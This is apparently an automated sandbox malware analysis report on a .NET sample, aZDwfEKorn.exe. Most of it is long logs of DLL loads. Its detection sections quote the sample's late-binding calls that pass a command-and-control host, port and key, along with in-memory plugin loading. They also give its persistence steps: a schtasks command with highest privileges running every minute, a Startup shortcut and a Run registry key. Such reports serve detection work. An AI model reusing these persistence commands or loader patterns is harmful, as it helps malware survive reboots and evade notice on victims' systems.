            Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
            Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\boostSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
            Source: boost.lnk.0.drLNK file: ..\..\..\..\..\boost
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: aZDwfEKorn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: aZDwfEKorn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: aZDwfEKorn.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: aZDwfEKorn.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: aZDwfEKorn.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: boost.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: boost.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: boost.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: aZDwfEKorn.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: aZDwfEKorn.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: aZDwfEKorn.exe, Messages.cs.Net Code: Memory
            Source: boost.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: boost.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: boost.0.dr, Messages.cs.Net Code: Memory
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC45D2A5 pushad ; iretd 7_2_00007FFAAC45D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC5700BD pushad ; iretd 7_2_00007FFAAC5700C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC642316 push 8B485F95h; iretd 7_2_00007FFAAC64231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC48D2A5 pushad ; iretd 11_2_00007FFAAC48D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC672316 push 8B485F92h; iretd 11_2_00007FFAAC67231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC49D2A5 pushad ; iretd 14_2_00007FFAAC49D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC5B0523 pushad ; retf 14_2_00007FFAAC5B05ED
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC5B0625 pushad ; retf 14_2_00007FFAAC5B05ED
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC682316 push 8B485F91h; iretd 14_2_00007FFAAC68231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC47D2A5 pushad ; iretd 16_2_00007FFAAC47D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC592AA8 push E95E0372h; ret 16_2_00007FFAAC592AC9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC662316 push 8B485F93h; iretd 16_2_00007FFAAC66231B
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile created: C:\Users\user\AppData\Roaming\boostJump to dropped file
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile created: C:\Users\user\AppData\Roaming\boostJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost"
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boost.lnkJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boost.lnkJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boostJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boostJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
